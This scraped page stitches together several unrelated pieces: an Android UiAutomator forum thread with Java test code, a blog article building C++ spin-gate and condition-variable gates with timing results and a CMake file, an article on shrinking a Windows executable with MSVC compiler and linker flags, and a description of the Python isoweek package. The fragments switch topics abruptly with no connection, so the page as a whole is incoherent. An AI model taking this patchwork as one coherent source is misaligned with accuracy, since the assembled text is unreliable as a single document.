at dalvik.system.NativeStart.main(Native Method)
INSTRUMENTATION_STATUS: numtests=2
FAILURES!!!
Tests run: 2, Failures: 0, Errors: 1
I have googled around but in google forums i found that such errors occur while running test cases on emulator but i am doing it on device so please help me out how to get rid of such error. an early reply would be very much appreciable coz i badly need to get the soultion.
I would also like to post my code as-
package mh_test;
import com.android.uiautomator.core.*;
import com.android.uiautomator.testrunner.UiAutomatorTestCase;
public class MainClass extends UiAutomatorTestCase {
{
public void testDemo2() throws UiObjectNotFoundException {
// Set the swiping mode to horizontal (the default is vertical)
// appViews.setAsHorizontalList();
UiObject eulaobject = new UiObject(new UiSelector()
.className("android.widget.CheckBox"));
eulaobject.click();
// Validate that the package name is the expected one
UiObject eulaValidation = new UiObject(new UiSelector().textMatches("I agree to the Terms and Conditions"));
assertTrue("Eula doesnot match",
eulaValidation.exists());
}
}
Thanks,
Ritima
It depends on your device. Since this is a new tool and it depends on the software deployed to the device in the device OS, you might find that unless you're running 4.2 on your device, you don't have all the updated methods in the tool. This was something I noticed as well and made comment towards in my main post. For now, try running your code in an emulator running rev 17 of the SDK and proving whether or not it works at all under the best case scenario. Once that's established, double-check the OS on your device. If it isn't 4.2, you may need to be satisfied with running your tests on the emulator for now.
Hi Russell
i was able to identify the cause of error, it was because i was using api 16 and some of the functions were not working in api 16.
Thanks for reply. And i would olso lyk to know more about uiwatchers, i read ur blogpost on watcher it was pretty good but if you can describe in more verbose manner with complex example that would be favorable. Thanks:)
Hi Russell
I am facing one more problem while using uiautomator that is- I want to check if there is an active internet connection established on my device before a particular test case is running. I searched around but could not get the desirable results.
Hey
I am unable to press 'Go' button on searching something on Nexus 7' tablet.I tried using following -
//Search something say "fun"
new UiObject(new UiSelector().text("Enter URL or Search & Win")).setText("fun");
getUiDevice().pressEnter();
OR getUiDevice().pressSearch();
Also tried :
getUiDevice().pressKeyCode(66); //for enter
getUiDevice().pressKeyCode(84); // for search
Could you help me out with this?
Hey Russel
Can you please tell which is the first class that is encountered when uiautomator is called. As far as I have understood, We need not write a main Activity class while dealing with the uiautomator for testing.
Russel,
Can you tell me where to find the new changes to uiautomator.
I want to see the new changes that have come to API Level 18 and Level 19(Kitkat)
Thanks
While running the UiAutomator the result is shown on the command prompt with failure and pass trace. Where can I get the complete report, Is there any possibility to generate any XML report using Uiautomator?
This is common to all of Google's provided test tools. Internally, Google uses a custom test tracking tool and thus uses custom parsing rules to suit their needs. The rest of us who appreciate basic things like generic XML reporting are left to look for things like the Polidea XML Test Runner for JUnit (e.g. Robotium) tests. In the case of the UiAutomator's output, I found this to be quite useful:
I hope that helps.
Thanks Russell...As of Today...Do you still use UIAutomator?...Or is there a better tool that you prefer?
Suuuuuuper late reply. I still use UiAutomator. I've got an upcoming blog post comparing it with Espresso that you might enjoy.
Not 4.1 and above, just 4.1. Each scrollForward method and methods like it keep returning false for if they are able to scroll again. This breaks scrollIntoView and you can kiss goodbye to any testing on small devices or anything that scrolls!
Swipe is also broken in the same way on android 4.3!
it is really amazing...thanks for sharing....provide more useful information...
Mobile app development company | https://www.everybodytests.com/2012/11/uiautomatorjar-what-happened-when.html | CC-MAIN-2019-13 | refinedweb | 2,864 | 63.19 |
I am not new to programming but I am new to C++. I have followed the directions of other sites of how to pass a two-dimensional array to a function. I am getting a confusing error. Please note that I have been working on this issue for two evenings. I tried to solve the problem myself before posting. I am also aware of the syntax of passing an array with the width defined. I am wanting to write a general use function and I don't want to be locked into any specific size.
Thank you in advance.
Here is my code:
#include <iostream>
using namespace std;
void initialize2DCharArray(char** array, int height, int width, char initChar);
void initialize2DCharArray(char** array, int height, int width, char initChar)
{
for(int colCount=0;colCount < height; colCount++)
{
for(int rowCount=0;rowCount < width; rowCount++)
{
array[rowCount][colCount] = initChar;
}
}
}
void main()
{
char c[3][3];
initialize2DCharArray(c, 3, 3, 'A');
}
Here is the error:
error C2664: 'initialize2DCharArray' : cannot convert parameter 1 from 'char [3][3]' to 'char **'
Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast | http://forums.devx.com/printthread.php?t=171793&pp=15&page=1 | CC-MAIN-2014-52 | refinedweb | 189 | 60.65 |
From: Matthias Schabel (boost_at_[hidden])
Date: 2007-03-28 18:42:43
Michael,
Michael,
Thanks for your positive review. I'm glad that the library is working
for you in a practical setting - that's always a concern for us
academics divorced from the real world ;^)
> specialization is simply the reciprocal of the first. Steven posted a
> solution to this in a separate thread just now and I hope that it will
> get included in the final version.
This should not be a problem; I'm accumulating a list of changes to
be made as they come in.
> Example 16 looks strangely familiar! Glad to see it was interesting
> enough to make the examples.
Your example was actually the impetus driving the decision to
implement heterogeneous units, a project that I know Steven spent a
significant amount of time and effort to get right...
> sure if this unit makes sense in the nautical namespace. One might
> ask "Why not boost::aerial?" The only reason I bring this up is
> because they are used for marine and aerial navigation. There may be
I tend to try to name things so they sound right if you read them;
even though they are used in aerial navigation, as far as I
understand they are still called nautical miles, so to my eye
nautical::miles reads right.
> other such examples, but I think all of the non_si_units.hpp units
> could reside in a boost::non_SI namespace with little confusion to the
> user. These would be all non-SI, but accepted, units (see
>).
This is probably one of the darker corners left in the library; I'm
hoping that reviewer input will help to shape the final form of the
non-SI portion of the library. Steven has some ideas for dealing with
the irregularities of US/Imperial units in a relatively clean and
elegant way. However, putting all of these into the same namespace is
problematic because there are, for example, differing definitions of
units having the same name (mile, in particular) so us_customary,
us_survey, and nautical miles are all slightly discrepant.
> I also noticed that the unit knots was not defined in
> non_si_units.hpp. Is this an oversight? Why are some accepted non-SI
> units defined and others not?
I just have very limited personal experience with and use for these
traditional units, so I didn't think to add it. I'm certainly happy
to put knots in. I don't believe they were listed in the NIST
documents I was referencing. Because there are so many irregular
units out there, I'm reluctant to promise to support everything under
the sun in the library, but the decision of where to stop is a bit
arbitrary. I just used the NIST document as my yardstick (sorry...)
> Is there an exhaustive list in the docs mentioning all units and
> their systems?
There is not yet, but should be.
> Yes, certainly. I would, however, like to hear Matthias' and Steven's
> thoughts on how easy it would be to add a run-time layer on top of
> their existing work.
A runtime component would be essentially a parallel library that
replicated the existing dimensional analysis functionality in runtime
code. I've mentioned previously that it would be relatively easy to
specialize to get a syntax like quantity<arbitrary,Y> that looks much
the same as the existing syntax. It probably wouldn't be hard to
implement runtime algorithms; I am still extremely skeptical that
there are many users out there who would be willing to pay the
computational cost and memory overhead of doing all of the
dimensional analysis at runtime. At a bare minimum, I would like to
see some "real" use cases where it isn't possible to get reasonable
behavior with the existing library. As you mention, the current
implementation works fine with GUIs as long as you're willing to pick
an internal representation for the units used at compile time. There
would also need to be compile-time -> runtime conversions, input
parsing, etc... which would involve varying degrees of effort - the
latter probably will be hardest...
Matthias
Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk | https://lists.boost.org/Archives/boost/2007/03/119000.php | CC-MAIN-2020-40 | refinedweb | 710 | 62.38 |
Martijn Wrote:Find some part of the script that says something like this:
PHP Code:
text = unicode(text,encode)
and replace with this.
PHP Code:
text = unicode(text,encode, errors='ignore')
text = unicode(text,encode)
text = unicode(text,encode, errors='ignore')
content = unicode(content, encoding)
content = unicode(content, encoding, errors='ignore')
def _unicode( text, encoding="utf-8" ): try: text = unicode( text, encoding) except: pass return text
def _unicode( text, encoding="utf-8" ): try: text = unicode( text, encoding, errors='ignore' ) except: pass return text
butchabay Wrote:@keibertz
The german translations are not up to date, i've added a lot of stuff under 2.07, so feel free to translate them.
I don't know why there are multiple entries in the db, i had 5 different, deleted every one and scraped my hole collection. This is what you have to do.
butchabay Wrote:Commited to SVN:
Weather (Not Weather Plus) Widget on Home
butchabay Wrote:Yeah, weather isn't yet finished, so i see to add more info, i just need a bit time and patience, as i hate coding all this weather stuff again the background panel too ...
ialand Wrote:something very strange, over the past 3 ro 4 versions, since Artwork Downloader has started being invoked with the 'Get Artwork' button, the whole machine will just freeze hard, the info screen slid 1/2 way to the right.. freeze hard as in reset button to get loose (this is on a standalone box, XBMC Live, pre-eden). It's persisted thru several pre-eden nightlys, several updates of V2 (on the latest now) and both 1.0 and 1.01 of Artwork Downloader... curiously enough it WILL work fine when you run it from the addon's menu, just freeze up and locks from the Get Artwork button....
any ideas?
butchabay Wrote:Dear Cirrus Extended V2 Users:
I'm thinking of creating a new Home Menu Item " Movie Sets " Ofcourse with option to show/hide and set respective Background. The Submenu entry remains as it is.
The other change i'm thinking off, is the Video Item, actually it brings you directly to files mode, but i think it should bring you directly to the root. | http://forum.xbmc.org/showthread.php?tid=102066&pid=957815 | CC-MAIN-2014-15 | refinedweb | 368 | 57.61 |
zactor(3)
CZMQ Manual - CZMQ/4.2.0
Name
zactor - Class for simple actor framework
Synopsis
// This is a stable class, and may not change except for emergencies. It // is provided in stable builds. // This class has draft methods, which may change over time. They are not // in stable releases, by default. Use --enable-drafts to enable. // **self_p); //. // Caller owns return value and must destroy it when done.); #ifdef CZMQ_BUILD_DRAFT_API // Function to be called on zactor_destroy. Default behavior is to send zmsg_t with string "$TERM" in a first frame. // // An example - to send $KTHXBAI string // // if (zstr_send (self, "$KTHXBAI") == 0) // zsock_wait (self); typedef void (zactor_destructor_fn) ( zactor_t *self); // *** Draft method, for development use, may change without warning *** // Change default destructor by custom function. Actor MUST be able to handle new message instead of default $TERM. CZMQ_EXPORT void zactor_set_destructor (zactor_t *self, zactor_destructor_fn destructor); #endif // CZMQ_BUILD_DRAFT_API Please add '@interface' section in './../src/zactor.c'., and zpoller. (zloop somehow escaped and needs catching.)
An actor function MUST call zsock_signal (pipe) when initialized and MUST listen to pipe and exit on $TERM command.
Please add @discuss section in ./../src/zactor.c.
Example
From zactor_test method
zactor_t *actor = zactor_new (echo_actor, "Hello, World"); assert (actor); zstr_sendx (actor, "ECHO", "This is a string", NULL); char *string = zstr_recv (actor); assert (streq (string, "This is a string")); freen (string); zactor_destroy (&actor); // custom destructor // KTHXBAI_actor ends on "$KTHXBAI" string zactor_t *KTHXBAI = zactor_new (KTHXBAI_actor, NULL); assert (KTHXBAI); // which is the one sent by KTHXBAI_destructor zactor_set_destructor (KTHXBAI, KTHXBAI_destructor); zactor_destroy (&KTHXBAI); // custom destructor // destructor using bsend/brecv zactor_t *BSEND = zactor_new (BSEND_actor, NULL); assert (BSEND); zactor_set_destructor (BSEND, BSEND_destructor); zactor_destroy (&BSEND); . | http://czmq.zeromq.org/czmq4-2:zactor | CC-MAIN-2022-33 | refinedweb | 265 | 55.34 |
N. What you want is unsafeLazySequenceIO, which uses unsafeInterleaveIO under the hood, which is IO-specific. As always lazy I/O is probably a bad idea and you should write a coroutine-based combinator for that. The simplest way is the ad-hoc way: pollEvent_ = do ev <- pollEvent case ev of NoEvent -> pollEvent_ _ -> return ev The coroutine-based method would look something like this: import Control.Monad.Trans.Free -- from the 'free' package newtype AppF a = AppF (Event -> a) type App = FreeT AppF IO Since FreeT is effectively just Coroutine from the monad-coroutine package you can use that one instead with the 'Await Event' functor, but the 'free' package provides a lot more useful instances. Your main loop can then suspend to ask for the next event and the surrounding application can provide the event in whatever way it wishes (for example ignoring NoEvent): myLoop = do ev <- await case ev of Quit -> return () _ -> doSomethingWith ev By the way, if your application is non-continuously rendered, which is suggested by your ignoring of NoEvent, you shouldn't use pollEvent at all. Rather you should use waitEvent, which blocks instead of returning NoEvent. That way you don't waste precious CPU cycles. The pollEvent action is meant for applications that are continuously rendered, where you would e.g. perform drawing when you get NoEvent. Hope this helps.: <> | http://www.haskell.org/pipermail/beginners/2012-September/010695.html | CC-MAIN-2014-41 | refinedweb | 228 | 58.11 |
1 Building a simple spin gate in C++
The simplest atomic boolean is the std::atomic_flag. It’s guaranteed by standard to be lock free. Unfortunately, to provide that guarantee, it provides no way to do an atomic read or write to the flag, just a clear, and a set and return prior value. This isn’t rich enough for multiple threads to wait, although it is enough to implement a spinlock.
std::atomic<bool> isn’t guaranteed to be lock free, but in practice, any architecture I’m interested has at least 32bit aligned atomics that are lock free. Older hardware, such as ARMv5, SparcV8, and 80386 are missing cmpxchg, so loads are generally implemented with a lock in order to maintain the guarantees if there were a simultaneous load and exchange. See, for example, LLVM Atomic Instructions and Concurrency Guide. Modern ARM, x86, Sparc, and Power chips are fine.
When the spin gate is constructed, we’ll mark the gate as closed. Threads will then wait on the flag, spinning until the gate is opened. For this we use Release-Acquire ordering between the open and wait. This will ensure any stores done before the gate is opened will be visible to the thread waiting.
// spingate.h -*-C++-*- #ifndef INCLUDED_SPINGATE #define INCLUDED_SPINGATE #include <atomic> #include <thread> class SpinGate { std::atomic_bool flag_; public: SpinGate(); void wait(); void open(); }; inline SpinGate::SpinGate() { // Close the gate flag_.store(true, std::memory_order_release); } inline void SpinGate::wait() { while (flag_.load(std::memory_order_acquire)) ; // spin } inline void SpinGate::open() { flag_.store(false, std::memory_order_release); std::this_thread::yield(); } #endif
#include "spingate.h" // Test that header is complete by including
Using a SpinGate is fairly straightfoward. Create an instance of SpinGate and wait() on it in each of the worker threads. Once all of the threads are created, open the gate to let them run. In this example, I sleep for one second in order to check that none of the worker threads get past the gate before it is opened.
The synchronization is on the SpingGate’s std::atomic_bool, flag_. The flag_ is set to true in the constructor, with release memory ordering. The function wait() spins on loading the flag_ with acquire memory ordering, until open() is called, which sets the flag_ to false with release semantics. The other threads that were spinning may now proceed. The release-acquires ordering ensures that happens-before writes by the thread setting up the work and calling open will be read by the threads that were spin waiting.
1.1 Update:
#include "spingate.h" #include <vector> #include <chrono> #include <thread> #include <iostream> int main() { std::vector<std::thread> workers; SpinGate gate; using time_point = std::chrono::time_point<std::chrono::high_resolution_clock>; time_point t1; auto threadCount = std::thread::hardware_concurrency(); std::vector<time_point> times; times.resize(threadCount); for (size_t n = 0; n < threadCount; ++n) { workers.emplace_back([&gate, t1, ×, n]{ gate.wait(); time_point t2 = std::chrono::high_resolution_clock::now(); times[n] = t2; }); } std::cout << "Open the gate in 1 second: " << std::endl; using namespace std::chrono_literals; std::this_thread::sleep_for(1s); t1 = std::chrono::high_resolution_clock::now(); gate.open(); for (auto& thr : workers) { thr.join(); } int threadNum = 0; for (auto& time: times) { auto diff = std::chrono::duration_cast<std::chrono::nanoseconds>(time - t1); std::cout << "Thread " << threadNum++ << " waited " << diff.count() << "ns\n"; } }
I’d originally had the body of the threads just spitting out that they were running on std::cout, and the lack of execution before the gate, plus the overlapping output, being evidence of the gate working. That looked like:
for (std::size_t n = 0; n < std::thread::hardware_concurrency(); ++n) { workers.emplace_back([&gate, n]{ gate.wait(); std::cout << "Output from gated thread " << n << std::endl; }); }
The gate is captured in the thread lambda by reference, the thread number by value, and when run, overlapping gibberish is printed to the console as soon as open() is called.
But then I became curious about how long the spin actually lasted. Particularly since the guarantees for atomics with release-acquire semantics, or really even sequentially consistent, are about once a change is visible, that changes before are also visible. It’s really a function of the underlying hardware how fast the change is visible, and what are the costs of making the happened-before writes available. I’d already observed better overlapping execution using the gate, as opposed to just letting the threads run, so for my initial purposes of making contention more likely, I was satisfied. Visibility, on my lightly loaded system, seems to be in the range of a few hundred to a couple thousand nanoseconds, which is fairly good.
Checking how long it took to start let me do two thing. First, play with the new-ish chrono library. Second, check that the release-acquire sync is working the way I expect. The lambdas that the threads are running capture the start time value by reference. The start time is set just before the gate is opened, and well after the threads have started running. The spin gate’s synchronization ensures that if the state change caused by open is visible, the setting of the start time is also visible.
Here are one set of results from running a spingate:
Open the gate in 1 second: Thread 0 waited 821ns Thread 1 waited 14490ns Thread 2 waited 521ns Thread 3 waited 817ns
2 Comparison with Condition Variable gate
// cvgate.h -*-C++-*- #ifndef INCLUDED_CVGATE #define INCLUDED_CVGATE #include <mutex> #include <condition_variable> #include <atomic> #include <thread> class CVGate { std::mutex lock_; std::condition_variable cv_; bool flag_; public: CVGate(); void wait(); void open(); }; inline CVGate::CVGate() : lock_(), cv_(), flag_(true) {} inline void CVGate::wait() { std::unique_lock<std::mutex> lk(lock_); cv_.wait(lk, [&](){return !flag_;}); } inline void CVGate::open() { std::unique_lock<std::mutex> lk(lock_); flag_ = false; cv_.notify_all(); std::this_thread::yield(); } #endif
#include "cvgate.h" // Test that header is complete by including
This has the same interface as SpinGate, and is used exactly the same way.
Running it shows:
Open the gate in 1 second: Thread 0 waited 54845ns Thread 1 waited 76125ns Thread 2 waited 91977ns Thread 3 waited 128816ns
That the overhead of the mutex and condition variable is significant. On the other hand, the system load while it’s waiting is much lower. Spingate will use all available CPU, while CVGate yields, so useful work can be done byu the rest of the system.
However, for the use I was originally looking at, releasing threads for maximal overlap, spinning is clearly better. There is much less overlap as the cv blocked threads are woken up.
3 Building and Running
cmake_minimum_required(VERSION 3.5) set(CMAKE_LEGACY_CYGWIN_WIN32 0) project(SpinGate C CXX) set(THREADS_PREFER_PTHREAD_FLAG ON) find_package(Threads REQUIRED) set(CMAKE_EXPORT_COMPILE_COMMANDS ON) set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -std=c++14 -ftemplate-backtrace-limit=0") set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Wall -Wextra -march=native") set(CMAKE_CXX_FLAGS_DEBUG "-O0 -fno-inline -g3") set(CMAKE_CXX_FLAGS_RELEASE "-Ofast -g0 -DNDEBUG") include_directories(${CMAKE_CURRENT_SOURCE_DIR}) add_executable(spingate main.cpp spingate.cpp) add_executable(cvgate cvmain.cpp cvgate.cpp) target_link_libraries(spingate Threads::Threads) target_link_libraries(cvgate Threads::Threads)
And here we build a release version of the test executable:
mkdir -p build cd build cmake -DCMAKE_BUILD_TYPE=Release ../ make
-- Configuring done -- Generating done -- Build files have been written to: /home/sdowney/src/spingate/build [ 50%] Built target cvgate [100%] Built target spingate | http://www.sdowney.org/2016/10/spingate/ | CC-MAIN-2019-13 | refinedweb | 1,207 | 54.12 |
Setting up a React application requires a lot. Learn how to bootstrap a React project without complexities! makes a React!
UI Styling
In ReactJS projects, you can create custom stylesheets and UI Components. A developer that's looking to rapidly build an application might not have time to create UI components from scratch. The community has blessed us with two popular libraries that possess ready-made UI components for use in your application. React-Bootstrap has all of the bootstrap features written purely as reusable React Components. Material-UI is a set of React Components that implement Google's Material Design.
Material UI
React Bootstrap
Material UI Code Example
import React from 'react'; import RaisedButton from 'material-ui/RaisedButton'; const MyAwesomeReactComponent = () => ( <RaisedButton label="Default" /> ); export default MyAwesomeReactComponent;') );
One effective way of bootstrapping your ReactJS project is to start by designing your UI components and then glue them together, that way you can split up the initial setup effort into several small parts along the project lifecycle. Pure UI explains this in detail. I also recommend these tools: Carte-blanche, React Storybook, uiharness.com. They will help a lot!
Network Requests
In a situation where you have to fetch data from an external API e.g calling the Github API in your ReactJS application, there are several tools you can use. I highly recommend axios and superagent.
HTTP Request Example With Axios
import axios from 'axios'; function getRepos(username){ return axios.get('{username}/repos'); } function getUserInfo(username){ return axios.get('{username}'); } const helpers = { getGithubInfo(username) { return axios.all([getRepos(username), getUserInfo(username)]) .then(arr => ({ repos: arr[0].data, bio: arr[1].data })) } }; export default helpers;
This is a helper utility that you can now call and render out in different ReactJS components within your app.
Flux Pattern - State Management
Flux is an application architecture for React that utilizes a unidirectional flow for building client-side web applications. With Flux, when a user interacts with a React view, the view propagates an action through a central dispatcher, to the various stores that hold the application's data and business logic, which updates all of the views that are affected. When choosing a dispatcher for your app, Facebook's dispatcher library should come in handy. It's easy to instantiate and use. Alongside this library, you will need any good Javascript event library. NodeJS EventEmmiter module is a good option. You can install flux from npm, the dispatcher will be immediately available via
var Dispatcher = require('flux').Dispatcher;. More details about the Flux pattern can be found here.
Redux
Redux evolves the idea of Flux. It's a state management library with a minimal API but completely predictable behavior, so it is possible to implement logging, hot reloading, time travel, universal apps, record and replay, without any buy-in from the developer. You can also install it via NPM like so:
npm install redux redux-devtools --save. Redux attempts to make state mutations predictable by imposing certain restrictions on how and when updates can happen. Redux has three fundamental principles:
- Single source of truth
- State is read-only
- Changes are made with pure functions
Read more about Redux here. Here is also an awesome list of Redux examples and middlewares. Another alternative for state management within your ReactJS application is Alt. More information about Alt here.
Authentication
Authentication is an important part of any application. The best way to do user authentication for single page apps is via JSON Web Tokens (JWT). A typical authentication flow is this:
- A user signs up/logs in, generate JWT token and return it to the client
- Store the JWT token on the client and send it via headers/query parameters for future requests
Authentication flow
A comprehensive example of adding authentication to a ReactJS app is here. Using Redux? Here is a good example of setting up authentication in your ReactJS application.
Implementing Authentication with Auth0. Multifactor Authentication, Single sign-on and passwordless-login is also a breeze with Auth0.
With Auth0, you can add authentication to any app in under 10 minutes and implement features like social login, multifactor auth, and single sign-on at the flip of a switch. It is the easiest way to add authentication to your app!
A full implementation of Authentication with Auth0 in a ReactJS application is here.
Data Persistence
Without a backend, you can persist data in your Single Page App by using Firebase. In a Reactjs app, all you simply need is ReactFire. It is a ReactJS mixin for easy Firebase integration. With ReactFire, it only takes a few lines of JavaScript to integrate Firebase data into React apps via the ReactFireMixin.
npm install reactfire react firebase --save
TodoList Example
import React from 'react'; class TodoList extends React.Component { render() { var _this = this; var createItem = (item, index) => { return ( <li key={ index }> { item.text } <span onClick={ _this.props.removeItem.bind(null, item['.key']) } style=> X </span> </li> ); }; return <ul>{ this.props.items.map(createItem) }</ul>; } } class TodoApp extends React.Component { constructor(props, context) { super(props, context); this.state = { items: [], text: '' }; } componentWillMount() { this.firebaseRef = firebase.database().ref('todoApp/items'); this.firebaseRef.limitToLast(25).on('value', function(dataSnapshot) { var items = []; dataSnapshot.forEach(childSnapshot => { const item = childSnapshot.val(); item['.key'] = childSnapshot.key; items.push(item); }); this.setState({ items: items }); }.bind(this)); } componentWillUnmount() { this.firebaseRef.off(); } onChange(e) { this.setState({text: e.target.value}); } removeItem(key) { var firebaseRef = firebase.database().ref('todoApp/items');; firebaseRef.child(key).remove(); } handleSubmit(e) { e.preventDefault(); if (this.state.text && this.state.text.trim().length !== 0) { this.firebaseRef.push({ text: this.state.text }); this.setState({ text: '' }); } } render() { return ( <div> <TodoList items={ this.state.items } removeItem={ this.removeItem } /> <form onSubmit={ this.handleSubmit }> <input onChange={ this.onChange } value={ this.state.text } /> <button>{ 'Add #' + (this.state.items.length + 1) }</button> </form> </div> ); } } ReactDOM.render(<TodoApp />, document.getElementById('todoApp'));
More information about persisting your data using ReactFire here.
Testing
Most projects become a mountain of spaghetti code at some point during development due to lack of solid tests or no tests at all. ReactJS apps are no different, but this can be avoided if you know some core principles. When writing tests for ReactJS code, it is helpful to pull out any functionality that doesn't have to do with any UI components into separate modules, so that they can be tested separately. Tools for unit testing those functionalities are mocha, expect, chai, jasmine.
Testing becomes tricky in a ReactJS application when you have to deal with components. How do you test stateless components? How do you test components with state? Now, ReactJS provides a nice set of test utilities that allow us to inspect and examine the components we build. A particular concept worthy of mention is Shallow Rendering. Instead of rendering into a DOM the idea of shallow rendering is to instantiate a component and get the result of its render method. You can also check its props and children and verify they work as expected. More information here.
Facebook uses Jest to test React applications. AirBnB uses Enzyme. When bootstrapping your ReactJS application, you can set up any of these awesome tools to implement testing.
Generators and Boilerplates
A lot of tools have been mentioned in this post in relation to setting up different parts of a ReactJS app. If you don't intend writing your app from scratch, there are lots of generators and boilerplates that tie all these tools together to give you a great starting point for your app. One fantastic example is React Starter Kit. It has a Yeoman generator. It's an isomorphic web app boilerplate that contains almost everything you need to build a ReactJS app. Another boilerplate is React Static boilerplate, it helps you build a web app that can be hosted directly from CDNs like Firebase and Github Pages. Other alternatives are React redux starter kit and React webpack generator. Recently, a nice and effective tool called
create-react-app was released by the guys at Facebook. It's a CLI tool that helps create React apps with no build configuration!
Conclusion
There are several tools that will help bootstrap your React app, we looked at a couple that we consider quite good and will have your application up and running in no time. But feel free to search for your own tools, and if you think that we are missing something, let us know in the comments. Setting up a React project should be painless!
"Setting up a React project should be painless!"
TWEET THIS | https://auth0.com/blog/bootstrapping-a-react-project/ | CC-MAIN-2017-04 | refinedweb | 1,416 | 50.23 |
Hey:
- Get the “Measure Ups.” I’ve been using the Microsoft Press Self-Paced Training Kit books for all my Microsoft exams, but one thing to note with a book that was published over 5 years ago is that the practice questions that come with it are going to be quite different to the questions you will actually get in your exam because Microsoft is always updating the questions in the light of technology changes and software revisions (e.g., Service Packs 1 and 2, and R2). I’m sure Microsoft won’t mind me mentioning MeasureUp.com, which currently has a 40% discount offer on their practice tests, using code “MUP1009”, which expires at the end of October 2009, so hurry!
- Get to know and love structural/architectural diagrams of Active Directory, including the triangles for domains, circles for Organisational Units, etc. They use these liberally in the exam and if you’re not 100% happy with this visual convention, you will be at a disadvantage. I’ll be honest: when I used to see these diagrams I was put in mind of Quality Street, especially the “Noisette Triangle” for domains! But this is the way to represent the various components of Active Directory and that’s that! I first of all downloaded the Microsoft Active Directory Topology Diagrammer, and second I availed myself of the Windows Server TechCenter pages, including this article, “Active Directory Logical Structure Background Information.”
- Set-up a virtual lab. When my peers were studying for their MCSE exams on Windows 2000 and 2003 a few years ago, they had to find spare hardware to install trial versions of Windows Server on, but now, we can all easily make study labs using virtualisation, so there’s no excuse for us now! I made a small study lab comprising a couple of sites, a couple of domains, and a few domain controllers, and then I did all the practices from the books. This was invaluable in my studies and I highly recommend this to you for the “70-294” exam in particular, as in my opinion it is the exam that most closely focuses on your real-life abilities.:
- You need to implement different domain-level security policies, such as password policies or account lockout policies: I need to remember I’m talking about Windows Server 2003, as you may or may not know that this limitation has now been removed from Windows Server 2008.
- You need to provide decentralised administration.
- You need to optimise replication across WAN links more than you can with sites.
- You need to provide different namespaces.
- You need to retain existing Windows NT domains.
- You want to put the Schema master in a different domain to account or resource domains.. | https://blogs.msdn.microsoft.com/microsoft_press/2009/10/26/andrew-levicki-if-at-first-you-dont-succeed-try-again-for-goodness-sake/ | CC-MAIN-2016-36 | refinedweb | 459 | 57.4 |
NOTICE: The following is not intended for real-world application. It is just an intellectual exercise to minimize the size of the program. The generated PE file may or may not be valid as it depends on behavior of specific architecture, OS and toolset.
Nowadays, the size of the program is no longer a big issue. But it is still very interesting to write program with extremely small size.
Here, I'll limit the discussion on X86 + WinXP + PE format to simplify the analysis. And I choose VC9 as our C++ compiler. The target program reads the number of queries first, then calculates the digest for each query and outputs the result.
If you use the default setting to compile the code, you will get an executable of size 56320 bytes.
cl /c test.cpplink test.obj
That is small, right? But most of the code in the executable is not yours. By default, the compiler will statically link to the CRT library, so they will reside in your program. We'd better get rid of these stuff. Let's add /MD flag to cl.exe. WOW! test.exe is only 5632 bytes now! But that is not the end of the story, we can decrease the size even further.
If you check the file generated, you can still find lots of stuff not belong to you. For example, the entry point procedure "start" is added "magically" by the compiler to initialize the CRT (you can check the source code of this function in Microsoft Visual Studio 9.0\VC\crt\src\crt0.c). In our program, these work can be safely ignored. We can pass /entry:"main" flag to tell the linker to use our main function as the entry point directly. Unfortunately, you will get the following linker errors if you do that:
MSVCRT.lib(gs_report.obj) : error LNK2019: unresolved external symbol __imp__TerminateProcess@8 referenced in function ___report_gsfailureMSVCRT.lib(gs_report.obj) : error LNK2019: unresolved external symbol __imp__GetCurrentProcess@0 referenced in function ___report_gsfailureMSVCRT.lib(gs_report.obj) : error LNK2019: unresolved external symbol __imp__UnhandledExceptionFilter@4 referenced in function ___report_gsfailureMSVCRT.lib(gs_report.obj) : error LNK2019: unresolved external symbol __imp__SetUnhandledExceptionFilter@4 referenced in function ___report_gsfailureMSVCRT.lib(gs_report.obj) : error LNK2019: unresolved external symbol __imp__IsDebuggerPresent@0 referenced in function ___report_gsfailure
Don't worry. That is what /GS flag does, and we will discuss it later. Here we simply pass kernel32.lib to link.exe to resolve the failure. The size of test.exe is now 3072 bytes.
/GS is used to detect buffer overrun, and is on by default. This flag is very useful for real-world application, but our program will not take the potential buffer overrun into consideration here. So we turn it off by passing /GS- to cl.exe and test.exe decrease to 2560 bytes!
There are no redundant code now, and we can focus on other stuff in our program. In PE format, different sections are used to store different kinds of data. For example, VC store code into ".text" and data into ".data". Each section will align to the 512-byte boundary in the file. That is why all the previous size of test.exe are multiply of 512. We can merge them to save the space (this is not safe for real-world application and may cause problems). These flags for link.exe are what we need: /MERGE:.rdata=.text /MERGE:.data=.text. We will then have test.exe of 1536 bytes!
With /O1 for cl.exe (minimize size), we can decrease the size to 1024 bytes. After loosing the section alignment requirement to 4 by linker flag /ALIGN:4 (again, this is not safe for real-world application and may cause problems), we achieve the size of 896.
All of these tunings are high level, and finally we decrease the size of the original exe by more than 98%!
cl /O1 /MD /GS- /c test.cpplink test.obj /entry:"main" /MERGE:.rdata=.text /MERGE:.data=.text /ALIGN:4
BTW: If the main is completely empty, the above flag setting can generate a program of only 468 bytes. That is the lower bound of high level size optimization. To go even further, we have to resort to low level approach. That will be described in the next post.
The program:
#include <cstdio>#include <cstring>static unsigned char Tbl[9]={1,1,2,3,7,5,6,4,8};int main(){ unsigned char BufT[0x401]; int n; scanf("%d",&n); for (;n>0;--n) { scanf("%s",BufT); unsigned long keyT[4]={0xCBDCEDFE,0x8798A9BA,0x43546576,0x00102132}; unsigned char *Buf=BufT; int tt; while (tt=*Buf++) { { int t=Tbl[tt%9]; for (int k=0;k<4;++k) keyT[k]=keyT[k]*t+0xFBFC; } unsigned long Buf1[4]; int t=tt&0xF; memcpy(Buf1,(char *)keyT+t,0x10-t); memcpy((char *)Buf1+0x10-t,keyT,t); memcpy(keyT,Buf1,16); } for (size_t k=0;k<4;++k) printf("%08X",keyT[k]); printf("\n"); } return 0;} | http://blogs.msdn.com/b/xiangfan/archive/2008/09/19/minimize-the-size-of-your-program-high-level.aspx | CC-MAIN-2015-11 | refinedweb | 825 | 68.26 |
isoweek 1.2.0
Objects representing a week
The isoweek module provide the class Week. Instances represent specific weeks spanning Monday to Sunday. There are 52 or 53 numbered weeks in a year. Week 1 is defined to be the first week with 4 or more days in January.
